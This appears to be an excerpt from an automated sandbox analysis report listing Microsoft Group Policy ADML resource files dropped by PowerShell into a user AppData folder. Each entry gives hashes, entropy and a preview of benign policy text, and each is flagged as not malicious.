                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Windows Backup</displayName>.. <description>Windows Backup</description>.. <resources>.. <stringTable>.. <string id="AllowOnlySystemBackup">Allow only system backup</string>.. <string id="AllowOnlySystemBackupExplain">This policy setting allows you to manage whether backups of only system volumes is allowed or both OS and data volumes can be backed up.....If you enable this policy setting, machine administrator/backup operator can backup only volumes hosting OS components and no data only volumes can be backed up.If you disable or do not configure this policy setting, backups can include both system or data volumes.</string>.. <string i

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsColorSystem.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1427
                                                                                                                                                                                                        Entropy (8bit):4.84683359240417
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ymLYLQqTKjUW3gHU5Xyp7lvW8/pV0FV:cgeD5x8gm8fKuTcgeiTD0FV
                                                                                                                                                                                                        MD5:39EDDC1EBA0C76841D195659381A44B5
                                                                                                                                                                                                        SHA1:3ED545728FAE06E6C94B15B443EE3CCBFED6B902
                                                                                                                                                                                                        SHA-256:DFF8FE621764236769B2C17AEC64C4A8496DD967CF2D3EB9E2F8103BD503E12C
                                                                                                                                                                                                        SHA-512:7A44DF7BF6E10E7985CD401D69C2361C888FF5D8CCE151C50DA871AD5F680A4EE5ED1941958014BD91FD45E0B5E6C84B6BD77467D9B6D1F197A2BA8096D17EA9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ProhibitChangingInstalledProfileList">Prohibit installing or uninstalling color profiles</string>.. <string id="ProhibitChangingInstalledProfileListExplain">This policy setting affects the ability of users to install or uninstall color profiles.....If you enable this policy setting, users cannot install new color profiles or uninstall previously installed color profiles.....If you disable or do not configure this policy setting, all users can install new color profiles. Standard users can uninstall color profi

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsConnectNow.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3410
                                                                                                                                                                                                        Entropy (8bit):5.029780460475183
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmCEXQ8gCBmXrmlBGx9HuT5nF2Uxt8IoV:EbEXQ8gCBmXrmMuT5F2Uxt8F
                                                                                                                                                                                                        MD5:7FDE7C285C5BFBCD2E562DB3F37096EC
                                                                                                                                                                                                        SHA1:FE32189EE6438FF319BDD9C79FFFDEEF158BA977
                                                                                                                                                                                                        SHA-256:1471ACA2B4BCD0A4D5BF43330741CC0314A243DE0757DB0383452A7C473E1644
                                                                                                                                                                                                        SHA-512:9C1C72D90D5F03399C6AB11029EEE9EB13B897723ED636094AE1565F5E55D4BF9F468A4F93E6BC45C5FA1C135DA0351E5EE2C3372A12C558607230ECC65E78B6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WCN_Category">Windows Connect Now</string>.. <string id="WCN_DisableWcnUi">Prohibit access of the Windows Connect Now wizards</string>.. <string id="WCN_DisableWcnUi_Help">This policy setting prohibits access to Windows Connect Now (WCN) wizards. ....If you enable this policy setting, the wizards are turned off and users have no access to any of the wizard tasks. All the configuration related tasks, including "Set up a wireless router or access point" and "Add a wireless device" are disabled. ....If you d

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsDefender.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (733), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):75437
                                                                                                                                                                                                        Entropy (8bit):4.739020696864297
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:UtkTlKxkN82stKz65oqibddrfPaeq6wEqx2xkN8AAS2VHU/2:UWBD82noaTrfPae62xy8AASD2
                                                                                                                                                                                                        MD5:F1A80F0C326A0FDE6917DD3AD03C6561
                                                                                                                                                                                                        SHA1:C014384966DEF2C68671E9BED95371447D96FA77
                                                                                                                                                                                                        SHA-256:03DD8B1E813023915A4F0143749E9CE752F81EDB973D4071CA522A03028CE619
                                                                                                                                                                                                        SHA-512:5FC276B7F1A8D8C3AE163910007405CB38108F5728EE9A2FAE74DD134FCDF3972BA4D46905650C252C96A18BFB781564A626621DAD7F9AFF49BC9D6751399A16
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AntiSpyware">Windows Defender</string>.. <string id="Exclusions">Exclusions</string>.. <string id="NetworkRealtimeInspection">Network Inspection System</string>.. <string id="NetworkRealtimeInspection_Exclusions">Network Inspection System Exclusions</string>.. <string id="Quarantine">Quarantine</string>.. <string id="RealtimeProtection">Real-time Protection</string>.. <string id="Remediation">Remediation</string>.. <string id="Reporting">Reporting</string>.. <string id="Scan">Scan</string>.. <string id="SignatureUpdate">Signature Updates</string>..

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsExplorer.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (989), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):57954
                                                                                                                                                                                                        Entropy (8bit):4.692320082638433
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:hctuJMsDha+k7JlgKVrag8E09FlZ9mzQNkQZZZaQZQP2BQvYIsyYiq:hpg8TluE5BQv5syYiq
                                                                                                                                                                                                        MD5:C1FBABFE3BC28D72CEB06DABDD8DCDDA
                                                                                                                                                                                                        SHA1:74660612AAE1056EBDB1DCBBE4D93AA163558AB4
                                                                                                                                                                                                        SHA-256:D350F2161317CCA32AD7BB4D6CF369F3AA81467122855F9FA8B8B0BA15F14893
                                                                                                                                                                                                        SHA-512:EC3B8C1449B89C5981CEC9D3F2072AD66D2C92FAC2336365C341959FF9AB60B60083C39D1413217B4F07FFEE3389B4C6DCFFF5B7A7F38EE781A934212F5A1A66
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ABCDOnly">Restrict A, B, C and D drives only</string>.. <string id="ABConly">Restrict A, B and C drives only</string>.. <string id="ABOnly">Restrict A and B drives only</string>.. <string id="ALLDrives">Restrict all drives</string>.. <string id="ClassicShell">Turn on Classic Shell</string>.. <string id="ClassicShell_Help">This setting allows an administrator to revert specific Windows Shell behavior to classic Shell behavior.....If you enable this setting, users cannot configure their syste

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsFileProtection.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4257
                                                                                                                                                                                                        Entropy (8bit):4.850396400130338
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pm1WXTuo/WBDr5RCutnwFBTb8WEMa3GUiKV:EQVJtwV3Zahi+
                                                                                                                                                                                                        MD5:2652912F37E3671937BB50F97C05FADF
                                                                                                                                                                                                        SHA1:F1B96B528263077B0DD66B9C004E923EAA71C6E8
                                                                                                                                                                                                        SHA-256:D7293FB074E7098858E2090DB60C7E3A8DC96FA062FACBABDA34AF48C57A4A8A
                                                                                                                                                                                                        SHA-512:F462F5F732207EFB517FAB537A556A80BD8BFE80302EBAF9436E34B3788ADF2907F53D08AF871D57EDD03D2C457ECC709320F7DC7F0D33F68F4E2254C111A9AF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WFP">Windows File Protection</string>.. <string id="WFPDllCacheDir">Specify Windows File Protection cache location</string>.. <string id="WFPDllCacheDir_Help">This policy setting specifies an alternate location for the Windows File Protection cache.....If you enable this policy setting, enter the fully qualified local path to the new location in the "Cache file path" box.....If you disable this setting or do not configure it, the Windows File Protection cache is located in the %Systemroot%\System32\Dllcac

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsFirewall.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (1085), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43147
                                                                                                                                                                                                        Entropy (8bit):4.809526069081037
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:1OHZuj3f3oPzINNKREqPRLHN83hOzwPvW+0NQkAV2ld0lrlBjSMDt3sKaT7c7cA:Z3jNNsohbvW+0NQkAV2ld0lrlB7
                                                                                                                                                                                                        MD5:0DDDC70E928C3191D6DB487772FCDDD6
                                                                                                                                                                                                        SHA1:124DCC7A766E35E7B8BD9C3EF6C5E62A447F6282
                                                                                                                                                                                                        SHA-256:5625F229BC2CE0518F0689C32B02F208D1B160274D5C9AC00707A15FD4F254AB
                                                                                                                                                                                                        SHA-512:BF17199483BB0DA38AEA1B64BC98CDED7F000B264BC45444423AC60D710E5855445BEB097523D28FB305E82824B75A4C76F99BA4488D9FA22754853A0BBDC073
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WF_AllowedPrograms_Help">Allows you to view and change the program exceptions list defined by Group Policy. Windows Firewall uses two program exception lists: one is defined by Group Policy settings and the other is defined by the Windows Firewall component in Control Panel.....If you enable this policy setting, you can view and change the program exceptions list defined by Group Policy. If you add a program to this list and set its status to Enabled, that program can receive unsolicited incoming messages on any po

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsMail.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1162
                                                                                                                                                                                                        Entropy (8bit):4.9740818694409095
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ynrrl8q+O0jSBC7knRupMRud+FV:cgeD5x8gm8fKs2q2SA7aoMzFV
                                                                                                                                                                                                        MD5:2CDED79A2DD5C6D41BFAA7567008F5CD
                                                                                                                                                                                                        SHA1:EC6C5B95AF0DC5559BD8013B3150600AFDCEEEBF
                                                                                                                                                                                                        SHA-256:9C7A2043D9D255F11092CE1303ABFD599BBEFC4459D1C87308D4738E2E7225A2
                                                                                                                                                                                                        SHA-512:C78FC573B695F8C1AE28056E1A19D80EBCB840D8FC7576353E50951043BC4E2F2E020DB9AE1BF2B81F53DF936E34C40BD1B84322F117B898E01B128D01BE1A33
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="TurnOffCommunities">Turn off the communities features</string>.. <string id="TurnOffCommunities_help">Windows Mail will not check your newsgroup servers for Communities support.</string>.. <string id="TurnOffWindowsMail">Turn off Windows Mail application</string>.. <string id="WindowsMail">Windows Mail</string>.. <string id="WindowsMail_help">Denies or allows access to the Windows Mail application.....If you enable this setting, access to the Windows Mail application is denied.....If you disable

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsMediaDRM.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (432), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1636
                                                                                                                                                                                                        Entropy (8bit):4.844281894305683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKmlUrPmP6TuZY4UG4c2SDlSFV:LeD5pm6lY1TuCG4IDUFV
                                                                                                                                                                                                        MD5:0BEF85C5A51F0980D97B8F87CC124C6B
                                                                                                                                                                                                        SHA1:72C086550C97C4E87B55D7171AA36E1EA33F1371
                                                                                                                                                                                                        SHA-256:EEFF3058ED45FA9E18846EE53BE4EF621B20BA2D7BB4535A81CDBF8066604E68
                                                                                                                                                                                                        SHA-512:CDD4647BC6B6CE9A3F1ED741C0929C1C768F0E4AF1B2DE27D7C161153CA744117FC34CFEF91C5DC72EDB8AE7FAD91C95F5125E90F2F02ACC27796A37B6E9B190
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableOnline">Prevent Windows Media DRM Internet Access</string>.. <string id="DisableOnlineExplain">Prevents Windows Media Digital Rights Management (DRM) from accessing the Internet (or intranet).....When enabled, Windows Media DRM is prevented from accessing the Internet (or intranet) for license acquisition and security upgrades.....When this policy is enabled, programs are not able to acquire licenses for secure content, upgrade Windows Media DRM security components, or restore backed up content licenses

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsMediaPlayer.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (560), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):22067
                                                                                                                                                                                                        Entropy (8bit):4.725628900708413
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:mndYKgb1n1M2UKzDSLikfF6vkRssT0vdtUL607p7aH:cbu3kQDGfFRsY0vQB7pc
                                                                                                                                                                                                        MD5:2E98C6915989DDC7243EFCC53275A5FC
                                                                                                                                                                                                        SHA1:D83FCE256850CA49F4F58F3D6DE0EFA6F1524B03
                                                                                                                                                                                                        SHA-256:AC668C6094254BED8D12F1BF3B6D8E60B552C288ACF47FAB101AB889BA9D824E
                                                                                                                                                                                                        SHA-512:D03A54A7ECB7186CDAE5EE39795F9B688C3E193847D0ED0F15CDF3EFC70077DDF2E572A2A5996641A000C4BECCF6C3E090A21FDEFB2D38B996EFF1D9F4771458
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Autodetect">Autodetect</string>.. <string id="ConfigureHTTPProxySettings">Configure HTTP Proxy</string>.. <string id="ConfigureHTTPProxySettingsExplain">This policy setting allows you to specify the HTTP proxy settings for Windows Media Player.....If you enable this policy setting, select one of the following proxy types:....- Autodetect: the proxy settings are automatically detected...- Custom: unique proxy settings are used...- Use browser proxy settings: browser's proxy settings are used.....If the Cus

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsMessenger.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2609
                                                                                                                                                                                                        Entropy (8bit):4.83243600779635
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKurmiSL30cT3cCtwpYS3tyLmHI+P25YS3t3zdFV:LeD5pmD7TMSy2FV
                                                                                                                                                                                                        MD5:3B589ADE17CCE578D294FF56D65F5321
                                                                                                                                                                                                        SHA1:3885D1E98889369FCDF0570B76601B0EEAAEED09
                                                                                                                                                                                                        SHA-256:BA36F02C4F20E6A6075C3091D0FD5BC81F6589552889FE4055C4BD90831A7699
                                                                                                                                                                                                        SHA-512:4BA6FE1BFB1209B03EA09ADDC64C288D9F076CD72EF968517E12A60AB8EC2060EF877D268ADA856D1B5BD4AA55CAE784D95F033FA839B66A84A039F8F0EFA206
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WinMSG_NoAutoStartWindowsMsg_Comp">Do not automatically start Windows Messenger initially</string>.. <string id="WinMSG_NoAutoStartWindowsMsg_Help">This policy setting prevents Windows Messenger from automatically running at logon. ....If you enable this policy setting, Windows Messenger is not loaded automatically when a user logs on.....If you disable or do not configure this policy setting, Windows Messenger will be loaded automatically at logon.....Note: This policy setting simply prevents Windows Messenge

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsProducts.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5639
                                                                                                                                                                                                        Entropy (8bit):4.939572011046928
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5a2Uy2oPZVH9GQPVtmkPl7Q6sP9dBIP0KP6bLPbxTPJiPG5CP5ubPbDyG7kWq:ENPnOXiVyZcNmTDxun
                                                                                                                                                                                                        MD5:14C496DDE1D1ACC8B3809CF194122870
                                                                                                                                                                                                        SHA1:4A500C7707FD2791A0118C078D5113B0EF4A2844
                                                                                                                                                                                                        SHA-256:C662D7E4BF2848728B8F335734CB6500C40E88727F1ABFABCD1E097B4C6B4FB3
                                                                                                                                                                                                        SHA-512:5FF521B1B1A903132003B2F20BE3502BA69388D8A9839EB4B8485B56EFB71751B0B69AFC0AF56B0601910A685CE4025F43930A1C24FCD8DDB585A8E17AD35760
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions" revision="1.0" schemaVersion="1.0">.. <displayName>Windows Vista products table</displayName>.. <description>This file contains all the product definitions used in supported on definitions.</description>.... <resources>.. <stringTable>.. Microsoft Windows -->.. <string id="MicrosoftWindows">Windows operating system</string>.. <string id="MicrosoftWindows2000">Windows 2000 operating systems</string>.. <string id="MicrosoftWindows2000_RTM">Windows 2000</string>.. <string id="MicrosoftWindows2000_SP1">Windows 2000 Service Pack 1</string>.. <string id="MicrosoftWindows2000_SP2">Windows 2000 Service Pack 2</string>.. <string id="MicrosoftWindows2000_SP3">Windows 2000

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsRemoteManagement.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (354), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14554
                                                                                                                                                                                                        Entropy (8bit):4.769003944604622
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EGUQ3V7eAfrBxq5L/cPcFS5YCZXGSqHL/LmLlUCEXjNi2+J1+sEG:9tBc5LUPcKYCZXGSqHDLmBcNi2S
                                                                                                                                                                                                        MD5:E24B954C1451F81FC8559A0F42D8B804
                                                                                                                                                                                                        SHA1:02CDBB99F2546ED8DD467B9799FDA9DECFE1F716
                                                                                                                                                                                                        SHA-256:A8B80A925FCC599E485029B1833C58865A6A16D872FB8766F9ACB8A1E0752D93
                                                                                                                                                                                                        SHA-512:156521221250B6029798C10A2BF138954280AEE73D34FEFCC6D6B3ABB9399824B9135D76A2F8FF1F975F1818D123E6D56DCAD7655E6D6EC5851E7D661926A802
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowAutoConfig">Allow remote server management through WinRM</string>.. <string id="AllowBasic">Allow Basic authentication</string>.. <string id="AllowBasicClientHelp">This policy setting allows you to manage whether the Windows Remote Management (WinRM) client uses Basic authentication.....If you enable this policy setting, the WinRM client uses Basic authentication. If WinRM is configured to use HTTP transport, the user name and password are sent over the network as clear text.....If you disable or do

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsRemoteShell.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5497
                                                                                                                                                                                                        Entropy (8bit):4.839558778753586
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:LeD5pmCfYYOpQgxeUMP5pWuPG47CngUmOuWg9m56V:EBfY/MPCCG4OngUq0o
                                                                                                                                                                                                        MD5:157A758A1233F9764CDFFCB79F8ADAB2
                                                                                                                                                                                                        SHA1:F1203844E770993418DCB257146C5BF98532F5C0
                                                                                                                                                                                                        SHA-256:35C10ECD562212B9C242ABCEA3EECD82965F173B8F8F2A848F1DD94F725EF0A1
                                                                                                                                                                                                        SHA-512:8E70D00D0FEA7F5164EC8BA0FF8B7F548A76A830DA19094827590D46399C4A1F5E21AA2054B5637F1C91095957DE1610C28BCC3974ED3FB36BE3ED6F2D067D45
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="AllowRemoteShellAccess">Allow Remote Shell Access</string>.. <string id="AllowRemoteShellAccess_Help">This policy setting configures access to remote shells.....If you enable this policy setting and set it to False, new remote shell connections are rejected by the server.....If you disable or do not configure this policy setting, new remote shell connections are allowed.</string>.. <string id="IdleTimeout">Specify idle Timeout</string>.. <string id="IdleTimeout_Help">This policy setting configures th

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\WindowsServer.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1011
                                                                                                                                                                                                        Entropy (8bit):5.086298346478668
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8x4+cCk2q1qOyENX/itRgv8FFV:cgeD5x8lcT/XNUFFV
                                                                                                                                                                                                        MD5:14AEA48E9379243660E8B568A71EF533
                                                                                                                                                                                                        SHA1:1EACA2C4A36AB2762757FA7CAA1D4256910ECC95
                                                                                                                                                                                                        SHA-256:A96786FAA32516C2738C2EC94E676F3D339732AB39318D7CDFFA478A2BAE1231
                                                                                                                                                                                                        SHA-512:24AF5CA8EB9650B61FF0A01467A36DD3F55C90741A4FD04C067420A3E150B57F50ADD536513B4D3F0E7A1EC37138205850FFAAED51A1525E1F063C737EFB50E7
                                                                                                                                                                                                        Malicious:false
